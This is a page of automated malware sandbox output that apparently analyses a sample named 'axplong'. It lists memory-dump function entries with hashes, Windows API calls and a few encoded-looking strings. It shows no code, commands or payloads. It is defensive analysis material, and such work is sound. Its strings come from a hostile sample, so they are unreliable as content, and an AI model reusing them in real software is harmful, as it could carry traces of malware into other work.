Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 3b3c2b933a3009c42cdd20de5f58027f0108a85dfb44db776704e53864313501
Instruction ID: a01e8ca0ae1da9b7c18262929003798a629906c2b7188e1c7ff299e16719289f
Opcode Fuzzy Hash: 3b3c2b933a3009c42cdd20de5f58027f0108a85dfb44db776704e53864313501
Instruction Fuzzy Hash: 11416DB5905384ABCB24EF66E8459AFBBFAEF98340B10442DF556D3650EB309805CB21

Function 006E6C79 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0647fe2c33445539495c1e7f2d58943d9e9b7a2f8509bebd26fe8c3cd40234d6
Instruction ID: 09ff3099660dd0796ea8172aa81b22418b8bb17e5fa0434c229d15860dc39888
Opcode Fuzzy Hash: 0647fe2c33445539495c1e7f2d58943d9e9b7a2f8509bebd26fe8c3cd40234d6
Instruction Fuzzy Hash: 6C213D31A02348BAEB117B65EC42B9E376BDF513B4F200324F5206B1D1DB705D158665

Function 006ED4D4 Relevance: 1.7, APIs: 1, Instructions: 198
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60a20ac64a61a17356d5df33b1b25069e80fb8c302e33f30c4e44b26a2ab3c39
Instruction ID: 79b7f6c63b6759aa2cc8c36a575ada2d99ffaed3c4d257dec8010d74bdcf676b
Opcode Fuzzy Hash: 60a20ac64a61a17356d5df33b1b25069e80fb8c302e33f30c4e44b26a2ab3c39
Instruction Fuzzy Hash: 71610532D023948FDF25EFAAD8846EDBBB2FB55318F248129E4496B390D7319C05CB55

Function 006B8290 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 006B8434

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 1930c0b76aba04cb3cb160a36f3cadf0327455ba52b8e423c2a9ff8637223b20
Instruction ID: 3ed8353b73d39ad63d5f85709d7cccafb6be2cf87472d2054411723dcbd313ef
Opcode Fuzzy Hash: 1930c0b76aba04cb3cb160a36f3cadf0327455ba52b8e423c2a9ff8637223b20
Instruction Fuzzy Hash: 555106B09002589FDB24EB68DD49BEEB7BADB45310F5042A8E804A73C1EF355EC0CB95

Function 006E6F51 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 006E6F93

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 5b05488f0bf87efc9d68ce68aafc2998615c5ada0a4f718fcdbf31e232eaadd7
Instruction ID: cfd93e7d84b5368a2315694d681f4a9953fc1f7f6b0fc965a4d21fea8bfd4239
Opcode Fuzzy Hash: 5b05488f0bf87efc9d68ce68aafc2998615c5ada0a4f718fcdbf31e232eaadd7
Instruction Fuzzy Hash: 43112EB290124CABCB10DF95D884EDFB7BEAF58350F104266F512E6180EB30EB49CB65

Function 006ED6CF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,006EA5CD,?,006E748E,?,00000000,?), ref: 006ED711

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a74814020b2fe187c37255a1d3ed96485a0fe4482864cb589dda60147d7a7b19
Instruction ID: 9bf8f27106a19d01a49a135cc017b71b142f65e817ba23bfa46e20b360c90a51
Opcode Fuzzy Hash: a74814020b2fe187c37255a1d3ed96485a0fe4482864cb589dda60147d7a7b19
Instruction Fuzzy Hash: A5F0E9315473F4669F212B639C15A9B7B9BDF417A0F188511EC089B2C1DA31D80446E5

Function 006EAEEB Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,FC13621F,?,?,006CD302,FC13621F,?,006C78CB,?,?,?,?,?,?,006B7415,?), ref: 006EAF1D

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d024c50ab0dd4bb636172238323a39c12e03cca7f1421b85a835f69bc2d668a1
Instruction ID: 51b37e1daf9dd58518490ad26cc507069698883968c899424ffd241af25de9ed
Opcode Fuzzy Hash: d024c50ab0dd4bb636172238323a39c12e03cca7f1421b85a835f69bc2d668a1
Instruction Fuzzy Hash: 19E0E5B11473E16ADB2027A75C447AB268B8F427B0F210120AC44972D1DA10EC0085F7

Function 006C6AB0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 006C6B35

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c721240d7de9c77cb20d2d15ba00cfe41cde6746b21342f92d9d0416ae57a35
Instruction ID: 13d855c416aa955954f7cba9add99c5f56f3ada75a15c24a040ca852de8ec65d
Opcode Fuzzy Hash: 2c721240d7de9c77cb20d2d15ba00cfe41cde6746b21342f92d9d0416ae57a35
Instruction Fuzzy Hash: 48F0F9B1A00504A7C700BB6CCD17B9E7B7AE702720F80435CE411672D2EA75191187D6

Function 050A0D1A Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3799958474.00000000050A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_50a0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1dbdcf196d93e0abce5ddf59056739f791b3a7cda9218ca7dc19361b7893a26
Instruction ID: e6f5889a9c270f10b1ba262cf76a33fb5a38c9ca0f0493b3d0135a8d5a7b2f9a
Opcode Fuzzy Hash: d1dbdcf196d93e0abce5ddf59056739f791b3a7cda9218ca7dc19361b7893a26
Instruction Fuzzy Hash: B5016DDF1885A87D748291D57B78AFF5B6FE6C3A703318917F447C4906A2891A8E6031

Function 050A0D03 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3799958474.00000000050A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_50a0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6fa134c9fa18a7a4e7b800c0bcdc171cc5a23c062f91fec25d9902f339433b9
Instruction ID: 133bf9c71a56341911a87a1c37c05bd89cb1e71c60f5f905dce932002d3daba5
Opcode Fuzzy Hash: a6fa134c9fa18a7a4e7b800c0bcdc171cc5a23c062f91fec25d9902f339433b9
Instruction Fuzzy Hash: 60F0CDEF14C5A47DB082C0C63B3CAFE5A5FE6D7630731C527F503D194696891A9D6031

Function 050A0D0C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3799958474.00000000050A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_50a0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeed0dfaa053e7714b87384f22a94ade2d5eaa6e487ea62b0075a9a756a8041e
Instruction ID: 491104871ef834150fd07adabbe2930c5a9f526a6d952b550273edfbd8a12cf6
Opcode Fuzzy Hash: aeed0dfaa053e7714b87384f22a94ade2d5eaa6e487ea62b0075a9a756a8041e
Instruction Fuzzy Hash: 59F0C4EF1495A47D7082D0863F28AFFAA6EE1D7730331C927F803D194692891A9E6131

Non-executed Functions

Function 006CCAED Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,006CCE55,?,?,?,?,006CCE8A,?,?,?,?,?,?,006CC400,?,00000001), ref: 006CCB06

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: 5fece9dda712737bc0ce02fdc3011b979b981420eb5862745db3f953b2cea3d3
Instruction ID: 6061fa1ed86a20dd7e0f6ce933f31054ca274e334789747fae4bdc91d2c4ffff
Opcode Fuzzy Hash: 5fece9dda712737bc0ce02fdc3011b979b981420eb5862745db3f953b2cea3d3
Instruction Fuzzy Hash: D3D0223260303893CA012BC8BC18EFDBB09EA01B703148026EC0D13210CA919C019BE8

Function 006E643B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9cd6da7886325049b9e3be5b6023a4176a2ce06a613f7bd22d377bf50421bd6
Instruction ID: 5d48e0ab38d4992ac20ae134e130fd9ebba68eb31563d73bb90b77c82cc35c19
Opcode Fuzzy Hash: f9cd6da7886325049b9e3be5b6023a4176a2ce06a613f7bd22d377bf50421bd6
Instruction Fuzzy Hash: FCE08630592688AFCE357B16D8689CC3B9FEF61381F108814F80446271CB35EC81C541

Function 006EA1A2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 36fb7ba1cd7cd0be123e4a8db7c3c3f0c14508036514d7f9e59616979d30037f
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 8EE08C32A26368EBCB18DBC9C9049CAF3EDEB48B10F2104AAB501D3250C270EE00C7D4

Function 006C2DF0 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

9wGTaHilQw==, xrefs: 006C2E97
stoi argument out of range, xrefs: 006C4239
246122658369, xrefs: 006C33A4
Xst=, xrefs: 006C338A
Gl==, xrefs: 006C366E
Inhk, xrefs: 006C375F
invalid stoi argument, xrefs: 006C422A

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$9wGTaHilQw==$Gl==$Inhk$Xst=$invalid stoi argument$stoi argument out of range
API String ID: 0-301961687
Opcode ID: fedf6b67576b18e8e78265f481a53d831cf4a0072bc708a518d6702d1dbe2e14
Instruction ID: 6257198d872e2df11fd46528be0c1bdbf0233831a925b5b466466845ac591a09
Opcode Fuzzy Hash: fedf6b67576b18e8e78265f481a53d831cf4a0072bc708a518d6702d1dbe2e14
Instruction Fuzzy Hash: 2802B170A00258DFDF14DFA8C959BEEBBB6EF05304F50419CE805A7382D7759A84CBA5

Function 006E4750 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 006E4787
___except_validate_context_record.LIBVCRUNTIME ref: 006E478F
_ValidateLocalCookies.LIBCMT ref: 006E4818
__IsNonwritableInCurrentImage.LIBCMT ref: 006E4843
_ValidateLocalCookies.LIBCMT ref: 006E4898

Strings

csm, xrefs: 006E482D
`8n, xrefs: 006E4835, 006E483E, 006E484F

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
